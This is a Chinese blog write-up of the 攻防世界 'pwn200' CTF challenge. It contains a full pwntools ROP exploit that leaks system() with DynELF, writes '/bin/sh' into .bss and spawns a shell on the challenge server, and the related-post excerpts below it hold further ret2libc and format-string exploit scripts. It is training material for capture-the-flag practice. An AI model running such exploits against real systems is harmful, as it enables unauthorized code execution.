攻防世界 pwn200 WP

最新推荐文章于 2023-03-20 18:30:37 发布
原创 最新推荐文章于 2023-03-20 18:30:37 发布 · 535 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了针对32位程序的ROP(Return Oriented Programming)攻击方法,通过利用system函数地址,写入'/bin/sh'字符串,并最终调用system函数以获取shell,展示了完整的攻击流程及代码实现。

32位栈溢出程序
关于ROP:https://blog.youkuaiyun.com/Zarcs_233/article/details/103996634
具体思路(ROP):
1.搞到system函数地址,可以通过dynelf
2.写入’/bin/sh’,用做system参数
3.调用system函数
EXP:

from pwn import *
context.log_level='debug'
p=remote("111.198.29.45",30502)
start=0x80483D0    #程序起始代码,实现复用
def leak(addr):
	write_addr=0x80483C0
	payload='a'*112+p32(write_addr)+p32(start)+p32(1)+p32(addr)+p32(4)  #rop调用write泄露
	p.recvuntil("Welcome to XDCTF2015~!\n")
	p.send(payload)
	buff=p.recv(4)
	return buff
dyn=DynELF(leak,elf=ELF("./bed0c68697f74e649f3e1c64ff7838b8"))
system=dyn.lookup("system","libc")
print("get system address:%X" % system)
def write():
	bin="/bin/sh"
	read_addr=0x8048390
	bss=0x804A048
	payload='a'*112+p32(read_addr)+p32(start)+p32(0)+p32(bss)+p32(8)  #ROP读入/bin/sh
	p.recvuntil("Welcome to XDCTF2015~!\n")
	p.send(payload)
	p.sendline(bin)
write()
payload='a'*112+p32(system)+p32(0)+p32(0x804A048) #ROP调用system获得shell
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.interactive()

这里由于是32位程序,参数直接存在stack中,所以可以直接构造栈帧,但是有一点需要注意,那就是bss,这里我没有直接使用bss开头,因为bss开头是stdin和stdout,而read之后跳转到start,程序会再次修改stdin和stdout的值。所以这里使用了bss结尾处的内存区域。

攻防世界pwn——pwn-200
qq_62076255的博客
12-23 679
做题记录
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 900
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
攻防世界 pwn-200
weixin_56777139的博客
03-20 415
32位 ret2libc。
攻防世界pwn200
qq_25044201的博客
01-17 341
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
XCTF攻防世界misc难度一所有整合wp
07-19
misc难度一所有整合wp即是指针对攻防世界中misc类别入门级别(难度一)的所有题目的解题过程和思路的总结文档。 在misc类别中,参赛者需要解决一系列涉及隐写术(Steganography)、二进制分析、文件格式解析、简单...
攻防世界 pwn新手区 wp
Gtooler的博客
10-07 606
get-shell 此题是经典入门题,没有设置任何漏洞,直接给了shell 直接nc连上,然后ls,最后cat flag即可 hello_pwn 发现只要让dword_60106C == 1853186401就可以拿到flag read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存 计算距离为4,写个exp即可 from pwn import * p = remote('111.200.241.244', '56851') p.recvu
攻防世界pwn新手题wp(通俗易懂)
njh18790816639的博客
03-10 2252
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
攻防世界pwn100 详细的WP
Zarcs_233的博客
01-20 962
pwn萌新做pwn题了 首先checksec shellcode肯定是行不通了 IDA打开看看 发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节 查看程序导入,发现没有system,查看string,发现没有’/bin/sh’ 所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢? 由于是64位系统,所以得...
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7423
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1846
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界-pwn-200-Writeup
SkYe's Blog
05-15 503
pwn-200 [collapse title=“展开查看详情” status=“false”]考点:栈溢出、泄露地址 漏洞函数如下: ssize_t sub_8048484() { char buf; // [esp+1Ch] [ebp-6Ch] setbuf(stdin, &buf); return read(0, &buf, 0x100u);//溢出 } 可操作空间空间很长就不需要什么骚操作了。就是没给 libc 文件,需要去libc database 查一下而已。查到
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 709
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2361
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.youkuaiyun.com/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
pwn200,一道不完全考察ret2libc的小小pwn
shanwei274的博客
04-08 428
pwn200 —XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。 1.获取pwn题 啪的一下就下载好了。 2.查看保护 拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了 3.ida看看 首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我
XCTF PWN高手进阶区之pwn-200
neuisf的博客
01-29 710
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1701
题目地址:pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
攻防世界PWN进阶区pwn100/pwn200/warmup
weixin_45461609的博客
05-12 707
攻防世界PWN进阶区pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
攻防世界 PWN
最新发布
12-12
攻防世界PWN有多个题目及对应的解题资料,以下是部分介绍: - **new_easypwn**:检查保护机制可知,该程序为amd64 - 64 - little架构,有部分RELRO,存在Canary,开启了NX和PIE。`readelf -h`显示ELF文件头信息,包含Magic、Class、Data等内容,可用于进一步的攻击点分析[^1]。 ```plaintext healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] '/home/healer/Desktop/attachments/hello' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled healer@healer-virtual-machine:~/Desktop/attachments$ readelf -h hello ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xa00 Start of program headers: 64 (bytes into file) Start of section headers: 8648 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 29 Section header string table index: 28 ``` - **签到题**:这是较为简单的题目,无需复杂操作,直接连接远程服务即可获得shell并拿到flag。 ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` - **新手区某题**:利用`printf`返回字符个数的特性,将`pwnme`的值改成8。 ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` - **[GFSJ0469] string**:题目有一段背景描述,“欢迎来到我的世界!我是一个巫师……可能会帮助你更好地了解它。”,但未给出解题代码,推测需结合这段信息进行后续分析[^4]。 - **pwn - 200**:通过泄露`write`地址,返回`main`函数,计算偏移找到`system`和`/bin/sh`的位置,最终获得shell。 ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值